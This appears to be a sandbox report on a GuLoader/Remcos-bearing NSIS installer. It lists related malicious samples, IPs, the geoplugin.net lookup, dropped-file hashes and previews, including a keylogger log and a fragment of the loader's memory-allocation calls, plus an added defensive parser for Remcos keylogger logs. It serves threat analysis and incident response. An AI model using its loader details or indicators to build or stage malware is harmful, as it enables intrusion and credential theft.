  178.237.33.50 (each via geoplugin.net/json.gp)
    segura.vbs | malicious | Remcos
    4qmS30qgbA.exe | malicious | Remcos, AsyncRAT, PureLog Stealer
    New_Order_#070824_Order_November-2024-pdf.exe | malicious | Remcos
    1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exe | malicious | Remcos
    z1ProductSampleRequirement.exe | malicious | Remcos
    17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exe | malicious | Remcos
    5Tqze.exe | malicious | Remcos
    PO-33463334788.exe | malicious | Remcos, GuLoader
    A & C Metrology OC 545714677889Materiale.xls | malicious | Remcos, HTMLPhisher
    QUOTE #46789_AL_JAMEELA24.exe | malicious | Remcos, GuLoader
Domain context (other analysed samples that resolved geoplugin.net, all to 178.237.33.50):
  segura.vbs | malicious | Remcos
  4qmS30qgbA.exe | malicious | Remcos, AsyncRAT, PureLog Stealer
  New_Order_#070824_Order_November-2024-pdf.exe | malicious | Remcos
  1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exe | malicious | Remcos
  z1ProductSampleRequirement.exe | malicious | Remcos
  17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exe | malicious | Remcos
  5Tqze.exe | malicious | Remcos
  PO-33463334788.exe | malicious | Remcos, GuLoader
  A & C Metrology OC 545714677889Materiale.xls | malicious | Remcos, HTMLPhisher
  QUOTE #46789_AL_JAMEELA24.exe | malicious | Remcos, GuLoader
ASN context (other analysed samples that contacted the same ASN; the report lists this block once for each of the two contacted IPs in AS64236, merged here):
  UNREAL-SERVERSUS (AS64236)
    PO-33463334788.exe | malicious | Remcos, GuLoader | 212.162.149.224
    RFQ_PO_UMQ736-ORDER#MATERIALS-LQKP0489.exe | malicious | XWorm | 212.162.149.53
    New_Order_568330_Material_Specifications.exe | malicious | AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm | 212.162.149.53
    OFFER KH-20241024.exe | malicious | GuLoader | 212.162.149.204
    OFFER KH-20241024.exe | malicious | GuLoader | 212.162.149.204
    Belialist.exe | malicious | Remcos, GuLoader | 204.10.160.182
    SecuriteInfo.com.Win32.Evo-gen.798.4975.exe | malicious | Remcos, DBatLoader | 204.10.160.167
    Unicredit.Pagamento.pdf.exe | malicious | Remcos | 204.10.160.230
    nicworkgbeeterworkgoodthingswithgereatniceforme.hta | malicious | Cobalt Strike, Remcos, DBatLoader | 204.10.160.167
    21st OCTOBER 2024 234876sdf ORDER_PDF.exe | malicious | FormBook, GuLoader | 204.10.160.169
  ATOM86-ASATOM86NL (AS8455; every entry is the geoplugin.net host 178.237.33.50)
    segura.vbs | malicious | Remcos
    4qmS30qgbA.exe | malicious | Remcos, AsyncRAT, PureLog Stealer
    New_Order_#070824_Order_November-2024-pdf.exe | malicious | Remcos
    1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exe | malicious | Remcos
    z1ProductSampleRequirement.exe | malicious | Remcos
    17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exe | malicious | Remcos
    5Tqze.exe | malicious | Remcos
    PO-33463334788.exe | malicious | Remcos, GuLoader
    A & C Metrology OC 545714677889Materiale.xls | malicious | Remcos, HTMLPhisher
    QUOTE #46789_AL_JAMEELA24.exe | malicious | Remcos, GuLoader
                  No context
Dropped file context (other analysed samples that dropped the same file):
  C:\Users\user\AppData\Local\Temp\nslA6E2.tmp\System.dll
    RemotePCViewer.exe | malicious | Unknown
    8737738_19082024.vbs | malicious | FormBook, GuLoader
    8737738_19082024.vbs | malicious | GuLoader
    Dhl Delivery(AWB 9849791014).exe | malicious | GuLoader
    Dhl Delivery(AWB 9849791014).exe | malicious | GuLoader
    89.hta | malicious | Cobalt Strike, GuLoader
    sahost.exe | malicious | GuLoader
    HSBC Advice_ACH_Credit_08082024 (1).xls | malicious | GuLoader
    sahost.exe | malicious | GuLoader
    sahost.exe | malicious | GuLoader

System.dll under a ns*.tmp directory is the stock NSIS "System" plugin that any NSIS installer extracts (hence its 0% detection above). The overlap with GuLoader samples reflects NSIS-wrapped GuLoader delivery, not shared attacker code, so this hash is not a useful pivot on its own.
Process: C:\Users\user\Desktop\orders_PI 008-01.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 52
Entropy (8bit): 4.0121618346445365
Encrypted: false
SSDEEP: 3:BPi4YDgAmcAKDHMnhv:BPiBkAmc0nhv
MD5: F298228D2D42CED0A00B0C5320000835
SHA1: FB06F02DDCDA4C9EC752A688EE617064DB3A49EB
SHA-256: E399AFE89F97EAE7BCDAE626913DA1618F4F42BA11887217CDBF524720532AB2
SHA-512: 464DA89F9E1D5935810443B20C3D19F77585D964DF89F5CB427482A03C8EF6274D06CBC01533D92C691FFD55E1725BA5F427D023A45A5128BCED0EEE11E083FE
Malicious: false
Reputation: low
Preview: [skaaltalerens]..nonsaleability=sammenstuvningerne..
(INI-style text with a section header and one key; the ".." in the preview are the CRLF terminators named in File Type.)

Process: C:\Users\user\Desktop\orders_PI 008-01.exe
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.38816599775145
Encrypted: false
SSDEEP: 3:rhlKlfeLJfU5JWRal2Jl+7R0DAlBG45klovDl6v:6lfQ+5YcIeeDAlOWAv
MD5: 5B22817491229961BAD6256F13694638
SHA1: 1A6E05349740775F3EFCE421F30E5557EEC9071C
SHA-256: 3378F38BBD09007A3337ECF6CFD67484FE9E4B20B56258E9F0ACE80D014230D8
SHA-512: 079E0A6200BAD7577D17BA1869547488994DFBD17D7845E4D891950DFD4FAE2E00D7CABDAA728271139DE8B7D271D191E229DACA87B198870A4ECF4C5743C745
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation: low
(The preview below is UTF-16LE text rendered byte by byte, so every other character is a null shown as "."; decoded it reads "[2024/11/04 03:27:35 Offline Keylogger Started]" followed by the foreground window title "[Program Manager]", with CRLF line ends. The timestamp is the sandbox's local clock, not the 09:26 +01:00 submission time.)
Preview:....[.2.0.2.4./.1.1./.0.4. .0.3.:.2.7.:.3.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
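For incident response the useful question about logs.dat is what was typed in which window. The parser below is an added example, not code from the report or from Remcos: it decodes the UTF-16LE file, splits it into keylogger sessions on the "[<timestamp> ...]" marker and attributes following text to the most recent "[<window title>]" line. The sample bytes are constructed to match the preview above; the keystroke line after the window title and the "[Enter]" rendering of special keys are assumptions about the format beyond what the preview shows.

```python
"""Parse a Remcos offline-keylogger log (logs.dat) into sessions and per-window
keystrokes.

Added example, not code from the report or from Remcos. The input bytes are
constructed to match the report's preview of C:\\ProgramData\\remcos\\logs.dat
(UTF-16LE text, CRLF line ends, "[<timestamp> Offline Keylogger Started]"
followed by a "[<window title>]" line); the keystroke line after the window
title is an assumption about the format beyond what the preview shows.
"""
import re

SESSION_RE = re.compile(r"^\[(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.+)\]$")
WINDOW_RE = re.compile(r"^\[(.+)\]$")


def decode_logs(raw):
    """logs.dat is UTF-16LE; tolerate an optional BOM and a truncated final code unit."""
    if raw.startswith(b"\xff\xfe"):
        raw = raw[2:]
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


def parse_logs(raw):
    """Return sessions as {"started", "event", "windows": [{"title", "keys"}]}.

    Lines are split on any CR/LF combination so a log truncated mid-CRLF still
    parses. A line that is only a bracketed token ("[Back]" by itself) is
    indistinguishable from a window title in this format and is treated as one."""
    sessions = []
    current_window = None
    for line in decode_logs(raw).splitlines():
        if not line:
            continue
        m = SESSION_RE.match(line)
        if m:
            sessions.append({"started": m.group(1), "event": m.group(2), "windows": []})
            current_window = None
            continue
        m = WINDOW_RE.match(line)
        if m and sessions:
            current_window = {"title": m.group(1), "keys": ""}
            sessions[-1]["windows"].append(current_window)
            continue
        if current_window is not None:
            current_window["keys"] += line   # keystrokes belong to the last window seen
    return sessions


def typed_by_window(sessions):
    """Collapse all sessions into {window title: captured text}, dropping
    windows where nothing was typed."""
    out = {}
    for session in sessions:
        for window in session["windows"]:
            if window["keys"]:
                out[window["title"]] = out.get(window["title"], "") + window["keys"]
    return out


# Constructed sample: the two lines visible in the report's preview, followed by
# an invented window and keystroke line to exercise attribution.
SAMPLE_TEXT = (
    "\r\n[2024/11/04 03:27:35 Offline Keylogger Started]\r\n\r\n"
    "[Program Manager]\r\n"
    "[Untitled - Notepad]\r\n"     # constructed, not from the report
    "hunter2[Enter]\r\n"           # constructed, not from the report
)
SAMPLE_LOGS = SAMPLE_TEXT.encode("utf-16-le")

if __name__ == "__main__":
    for session in parse_logs(SAMPLE_LOGS):
        print(f"session {session['started']}: {session['event']}")
        for window in session["windows"]:
            print(f"  [{window['title']}] {window['keys']!r}")
```

Run against the real file the output is the keystroke timeline an investigator needs for scoping (which credentials were typed while the RAT was resident); the sample above yields one session starting 2024/11/04 03:27:35 with nothing typed in Program Manager and "hunter2[Enter]" attributed to the constructed Notepad window.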
Process: C:\Users\user\Desktop\orders_PI 008-01.exe
File Type: JSON data
Category: dropped
Size (bytes): 957
Entropy (8bit): 5.008571958992753
Encrypted: false
SSDEEP: 24:qkdVauKyGX85jHf3SvXhNlT3/7YvfbYro:pba0GX85mvhjTkvfEro
MD5: B1F05BD1D9797A053BD883B79053E83F
SHA1: A50F7AD9ACAD761C41ADF29105B13A9F1E2C33E4
SHA-256: 9B2A81AEA54244C5FA7784627B5CD957FCFA65BCC07E6806CDE4138B8BFD9916
SHA-512: B200C60C6A535D686374778AFFAB641F63234ADDD8BD4C29C867721AB75D5DC6B8AF69F632DAC3BEC310DA00EB3E0F69B3C07CB8674ABEAB047A484F62EA6A48
Malicious: false
Reputation: low
Preview: {. "geoplugin_request":"173.254.250.69",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
(This is the saved response to the http://geoplugin.net/json.gp request; "geoplugin_request" echoes the public egress address of the analysis network, which is why the location reported is Texas rather than the sandbox's own time zone.)

Process: C:\Users\user\Desktop\orders_PI 008-01.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x236a0710, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 15728640
                                      Entropy (8bit):0.9442062962858436
                                      Encrypted:false
                                      SSDEEP:12288:IcCS8rMTkTaTeUZT+T5SFnTKXpmlGVvK:IcrTGv
                                      MD5:711A66C3EC930BC3725BB37E819E1CD0
                                      SHA1:604EFA4144EB02B6A185A6A6A8F0F1F6510EFC84
                                      SHA-256:03E3854ABA10D9B0898D2DC88702A963F60DE4207FC1B4004CFF83CA54051AD1
                                      SHA-512:E19F0B75CB026C83B199C0EAB729B1FFCE2A4FEC3774C7A352A8E6C89AC5CFB15A35975CBE69C76FEE3C75D542E7A2A8C79BFC7495F9CF2016B547DDB016FA29
                                      Malicious:false
                                      Reputation:low
                                      Preview:#j..... .......!........v.......{......................d........$...{.......|!.h...........................0s......{..............................................................................................Y...........eJ......n........................................................................................................... ........"...{..............................................................................................................................................................................................;....{...........................................|!.................Qd.+.....|!..........................#......h.......................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):12288
                                      Entropy (8bit):5.737556724687435
                                      Encrypted:false
                                      SSDEEP:192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
                                      MD5:6E55A6E7C3FDBD244042EB15CB1EC739
                                      SHA1:070EA80E2192ABC42F358D47B276990B5FA285A9
                                      SHA-256:ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
                                      SHA-512:2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: RemotePCViewer.exe, Detection: malicious
                                      • Filename: 8737738_19082024.vbs, Detection: malicious
                                      • Filename: 8737738_19082024.vbs, Detection: malicious
                                      • Filename: Dhl Delivery(AWB 9849791014).exe, Detection: malicious
                                      • Filename: Dhl Delivery(AWB 9849791014).exe, Detection: malicious
                                      • Filename: 89.hta, Detection: malicious
                                      • Filename: sahost.exe, Detection: malicious
                                      • Filename: HSBC Advice_ACH_Credit_08082024 (1).xls, Detection: malicious
                                      • Filename: sahost.exe, Detection: malicious
                                      • Filename: sahost.exe, Detection: malicious
                                      Reputation:moderate, very likely benign file
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...X..`...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:3:Qn:Qn
                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:..
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:DIY-Thermocam raw data (Lepton 2.x), scale 175-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8.000000
                                      Category:dropped
                                      Size (bytes):385914
                                      Entropy (8bit):1.2561626561864936
                                      Encrypted:false
                                      SSDEEP:768:++TtgE2yMxqLKoiyt4CpVdIwu3Uema6LhlEv9cCAXP69rBqGDpx/NEJKTPLqqQJl:bMFgNCAE6oLJS9a/IrOyTWq2uC
                                      MD5:A4946227DE4DC2A79BF473A3D09C4247
                                      SHA1:9FF800E6B4A72B6281D812710D00AD003F757170
                                      SHA-256:1F6BB50C9AC95A61782FCDE006B6E396ACEDA7794FD30FFB7D97020FD7B8059E
                                      SHA-512:2902630584092375E1A2FB4669437C43548BC0D0E00B2B98A3FDAEEDC57F3567B61A3FC545C8157FD410D6E26C9A70E8D989E97983700FFB55D9D1154CEBE1F4
                                      Malicious:false
                                      Reputation:low
                                      Preview:..................................................#..................................._............................{.........................P................$.............................................................................................}............&................g.........................................A................................................K................................................Z..............-......5.........................................................e.......d..........................................L...............0......C................).................................................................................r............Q..2........................9................(...............................................t......................................................................>.....b..8.....................n.............]..................F.....................................U...................................S.........
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):589
                                      Entropy (8bit):4.277818373535095
                                      Encrypted:false
                                      SSDEEP:12:mScXAtJsdW8lLQIVVCTP1t0laiam6mObo/Bpqwnh2yKbdB1j1f:mSrTsdRTVVM9Yz69Hwh2yKb7ff
                                      MD5:E80E34F461528DF8F86C4248C971B2AD
                                      SHA1:A1A74D8F5711DEED35AF2B81BE070CA471C39500
                                      SHA-256:F2552D843F4D62F481743A15B7C95AA322C14EA5DBB999C8C889A42CBB093A8E
                                      SHA-512:46A5D6487131677DAC16C2BE4FC29517C14CB8DB6228B40344D733597462122EF0D1D7DD69B4D5A7A10F9C86635F99D91E91AC2CEBDF923C6B72EF3809637622
                                      Malicious:false
                                      Reputation:low
                                      Preview:pervalvar udvalgsarbejderne illegitime besully.trvarefabrikkers stemmeslugers binomialfordelingernes metropolit.mariolatrous griffy fiskeeksporten valutapuklerne spekulanter infusioners quantifys unconsolidation digitalises forvaltningsret..steticismens advents syde rebaptization returneredes chemosterilants agtvrdige,balklines sludres drengestregers topful koordinatvrdien angorakats tendensromanens blockheadish lidelsesfller eskapismes amiably phenicious nontenurial..overspringe udmntede agnostiker polycarpic stolper lbskes forhandlingsomraader acquires duskly kildnes gaultherase..
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):276701
                                      Entropy (8bit):1.2570216910370695
                                      Encrypted:false
                                      SSDEEP:768:yFPJSwGwS4JXi8PNDQNMDeMW3SGBqGHw1zwpmPMoaO64g1abi4IZxeMcdN9vfd95:/rFf4EoTti54LkFvI3oDW
                                      MD5:18C3DA2AA022FF0B89999E28E6A2AE9A
                                      SHA1:0659DDE0FD4B39B22825F1645A0BAE7E7202C7F9
                                      SHA-256:05DE1FF63CC38C7C4B3034091A311791BFF578658FF17D156AA4FB41A2E197C6
                                      SHA-512:D3A51D8B29FEF026F94B339087413319E03DA3193D9159A43AD7B4FEE35A67EEEBC3E66A0092B5ED14F57458173D518C618F2EE00F4203F428EBE0FC162F667C
                                      Malicious:false
                                      Preview:......................................................(.L.................................3........&.................."...........l........................s.....................................-...........................8..........@.........................................................h..................................@.........).........................I.................F..................................................................T..............................................................j..".......#I.............r.............&..................|...............................................................................:.Z......................).............................................................................H.......C...........................................................................................t.........................................................M.............4........'........................................}..+.......................
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):313672
                                      Entropy (8bit):1.2567166720965932
                                      Encrypted:false
                                      SSDEEP:768:iEGLlMkjkYtwS3MeXM3OpckON5VIbjnI3Oif4NxZSqJbDvz+hE7IkHAYsaW3DQLF:LtWLdp3I3yrt+3SoTMU5oT5
                                      MD5:17B0342D31B6E728E13DF79009833371
                                      SHA1:B9F3354C4E886382D220D5EC4FA91F389585BD40
                                      SHA-256:8CAF84CE635BD92186709E81D12AE352E049C83B53F1C22A6DCB221E8F1C011E
                                      SHA-512:4772F5AE64E0619B23114A41785DDE7DD1A9BACE12A9ABEDEF3400EDB3660D4E780C9B91E23A9FDEC1D97BCF7DC48E201771D7D58EB1740191A05CCFDB433C83
                                      Malicious:false
                                      Preview:....................N............................k....................................................#.................................................................................`........0.............u...................................y................................................................g.........7................E.......&........w..............................................*....................<..................................3................i.......................................................................U...).................................................. ........................................................................................................................A..............................N......c.b.......................................................................................................N........T..............................................h..............................................................................
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):9437
                                      Entropy (8bit):4.480159772832071
                                      Encrypted:false
                                      SSDEEP:192:Jxy5BzknZQeAE9zL/NR2CNzUWG9//5Uc5:anzkZ9z3/NA0KX5Uc5
                                      MD5:06E8FED876003B3AC855C94B4E0BE59D
                                      SHA1:85BD886154F33D5F67BE64A865B03BC3D04CD70F
                                      SHA-256:169E6EA357FC6DBD10E530FCFCFA50386BA75247273597CD43A63F9951899535
                                      SHA-512:455354FAB278D537404C17AD8E97ED9C29CAEB5FFB21B1588254D2FCE6C5EE58B17751463991D3E1116DD89CAC6B2753269100A34371442793054A14FACBADCA
                                      Malicious:false
                                      Preview:........*.....EEE........).WW............oooo.RR.@@..............A..y.V......o.............S..ak...e...r...n...e...l.443..x2...:...:...C...r...e...a..mt..7e...F..^i...l...e.P.A...(...m... ..vr...4... ...,... ...i... ...0...x...8...0.'.0...0...0...0..70..w0...,... ...i.0. ...0..X,... ...p... ...0..r,... ..Ki... .aa4...,... ...i... .G.0...x...8...0...,... ...i.h. .*.0.77)...i.~.....r...8.....!.k..Le...r...n...e...l.&&3...2...:...:..<S...e.B.t...F...i...l...e...P...o...i...n...t...e...r...(...i... ...r...8...,... ...i... ...2...3...0...1...2... ...,... ...i... ...0...,...i..S ...0...)...i..8....r...4.......k...e...r...n...e...l...3...2.3.:...:...V...i...r...t..Ru...a...l...A.|.l...l...o...c...(...i... ...0...,...i... ...2...7...6...5...2...0..\9...6.kk,... ...i... ..h0...x...3...0...0...0...,... ...i... ../0...x...4.i.0...)...p.......r...2.......k...e...r...n...e...l...3...2...:.11:...R...e...a.y.d...F...i...l...e...(..Bi... ...r...8.ll,... ..fi.?? ...r.?.2...,... ...i... ...2..#7...6...5
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):244482
                                      Entropy (8bit):1.2509108197987615
                                      Encrypted:false
                                      SSDEEP:768:ArczTS8oocp0tWLSMkXWg7PKU30gfL4Qf1AUdyM03I3xkjFlu7NDSAZd+6XYIHXd:7Yhp0ckXv78owAC3MhxqI
                                      MD5:E6AC7A31DA2D4322339135AD20EB0F23
                                      SHA1:F76C6D6EE7C9B01DB799642990AA88B140003EC4
                                      SHA-256:00FAD7EC11DB9706955FDF3BE0E6FB037E9F9780F94A502A774B30AB52773A94
                                      SHA-512:C87DABB08D092D546FF80270B052CF1C5D92D25852DBFECC139CE528CCD2A22CCE130A8C90C08117DF542E6D83DE91E92180F853C201F042BED4681D4737E75D
                                      Malicious:false
                                      Preview:............................................w.........................................................................\.............................o.............q......................................]..........................I...............!...............................................m....... ............................................................................................h......K................=............................................................r..................................W....................................................................R......................................p..0...........................................................k.........k........................d........................................................................................................................9....................................#.....A........`...9...............P.......................................................................\...............
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):198289
                                      Entropy (8bit):7.344208044493616
                                      Encrypted:false
                                      SSDEEP:6144:EAaO357P3ehcQVXJrF7TH7JOJFeB4dG2UIpRZ:vaOp7PO6QR7THN8w4dUsZ
                                      MD5:6A35648F77E6363BCE0DE47D934AB494
                                      SHA1:33CF7D82F5819CA739D5E2A784FB975B0BF16A99
                                      SHA-256:9D3B9B1C5C1B26412F53F4FA81542C8B9DFDE8F8C02E4CFDE656852CE03D60BC
                                      SHA-512:E362A84A1C2A7BB553B2D89277D2C2B60449D56DE0D328E0A7C6DDD6BC2B0B94028AAECBAA84F993FFBE50F98E2B6D219E1E298C7D867022AFF10DE8FDFB01C2
                                      Malicious:false
                                      Preview:...........................5.%%....AAAAAA._...iiiii..........................v....,.D..................................(((.........II.................55......D...8.7.BBB............................-.g......................m.............................wwww.......^...XXX...................._.........Q.YYYYY......u..N...........::......../.&....................AAA..............ZZZZZZ.}}..y..tttttt...FF.III.........D...............................$..V................................e...QQQQQQ. ...C......V..........111111...............CCC..g..............................................M.H..............!..%..*.````......R......L.>>.333......{{...............................z....5...JJJJJJ.............7....666..>..<<........8......?..............EE...p............?...........D.....YY................................Y.kkk.....---......................).<<..........<<<<<...............pp...............33.?...................<<<.....................9...................j...........<<.........NN
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):430713
                                      Entropy (8bit):1.2530301266200883
                                      Encrypted:false
                                      SSDEEP:1536:vu65sFtuGbUq4CCWG9TcLs9xEEc0MVWFnhMA:2PjbUquWUYs/9x
                                      MD5:8ED0D91C7C65B02A5630D1A012895C3D
                                      SHA1:FA74C3BD3A32123D71AEA67D386B5AC251FEC260
                                      SHA-256:1113E4990BEF55E4CD1D868513B2305C72803FB296D559BFA9C8C93DE2EDC8AB
                                      SHA-512:FBE41906CCABB44E8D71D7664B756F75ABDBF0FB80BFCBBF4BBA9D9370DF4CEDBE437BA9F116B3F9E9D2AE2FB1E2D34D34F152E518A2E5E0096A506093F8DB24
                                      Malicious:false
                                      Preview:..[.Z.....?............#......................................................0.....B..x....................................................Q.......Z......................I....j............{..........................................................................................................................................-.....7..............................M........9.U...........?...............................................................X..................../.....................t...............4................,........`........~..............d............................u............{.....................a.............................5.............{...g....Z.................H................l..........................S.............................................................................................................................J...........................................U............................x.....f.............D..../....o........................QLi...
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):223405
                                      Entropy (8bit):1.2642457624863013
                                      Encrypted:false
                                      SSDEEP:768:DDh04DrooyUGbNSipoS0yYEt0ihBLBJU06zf8VWZt+il3sVxTD6I6o9+2u5inuB4:rorpFGQVWwj9bQdun2ljrAbUGl
                                      MD5:96E6C0CBBACF232110DF3E7FC4B4D980
                                      SHA1:FC18FDD4E5417AC76F68BF507AC0BA6B9A183CFE
                                      SHA-256:04F64748055424253509A229EE3E6F9BFC86898CBA667DA8312333552987B610
                                      SHA-512:8DD22ABBED1522A08E9AC3559F5CC6871B77C1B76C2A7AA0CD61E52CA7D3A43DCBAF00285BF29C1FF885FC5F424FA411F56F19EB1886DA97CC7010BCA66530A9
                                      Malicious:false
                                      Preview:....................................{............!.............Q.............................................................................:...........z..................................W.......................... ......................................3...........y...............j................!n...............................................................................3........................+.......................a.......................c........................................)............................................................................................................................?.............................................................................................S....../.....................................................6./...t..+.......................H............{..........&................................b............................R.......x....=..................V....]........>...................................m................0.....
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):6.444410684161442
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:orders_PI 008-01.exe
                                      File size:906'904 bytes
                                      MD5:5009d8c72623d30ce09149187c66d37c
                                      SHA1:5c6035f099f16ff4753198e5f631ba410e98227f
                                      SHA256:e38bdd8374c7e1640e8fe34c531228dd9389affb9659cb7c49c00129baa73bdf
                                      SHA512:5908f38589b4097fd96f35129bbfa344a7940193ef0df6dab4e514106e7054c8ea9b3e97f9ebb7ff36fdbbd7c724cd1500e37f6c1ea6013f51842d39a642b5c1
                                      SSDEEP:12288:i3nIF6bq58AFe0TenvBdHdpUXjwxipfpQGYAGau5yxX9O9R:i3IFsmez5pdpUXjUiNuGYpawA9uR
                                      TLSH:18155849A38C90C6DD3A3B32F91D3613B655AC138950148A7AC8BE583BF57B07B5FA31
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L......`.................f....:....
                                      Icon Hash:d3672eac1a0c662c
                                      Entrypoint:0x4034a2
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x60FC90D1 [Sat Jul 24 22:14:41 2021 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:6e7f9a29f2c85394521a08b9f31f6275
                                      Signature Valid:false
                                      Signature Issuer:CN=Stallet, O=Stallet, L=Bilsington, C=GB
                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                      Error Number:-2146762487
                                      Not Before, Not After
                                      • 09/03/2024 12:26:01 09/03/2027 12:26:01
                                      Subject Chain
                                      • CN=Stallet, O=Stallet, L=Bilsington, C=GB
                                      Version:3
                                      Thumbprint MD5:EED03D11CC78DE80615CA26E748BF14D
                                      Thumbprint SHA-1:D32B85EE6B03EB76C4147DC3157B7646C80642BC
                                      Thumbprint SHA-256:53E1F408FA3313ACA407BFC66C0B75EE48D206776EED525E88E317F259285D7A
                                      Serial:688D5266029D3612D4D2D8869846237BA286D84B
                                      Instruction
                                      sub esp, 000002D4h
                                      push ebx
                                      push esi
                                      push edi
                                      push 00000020h
                                      pop edi
                                      xor ebx, ebx
                                      push 00008001h
                                      mov dword ptr [esp+14h], ebx
                                      mov dword ptr [esp+10h], 0040A2E0h
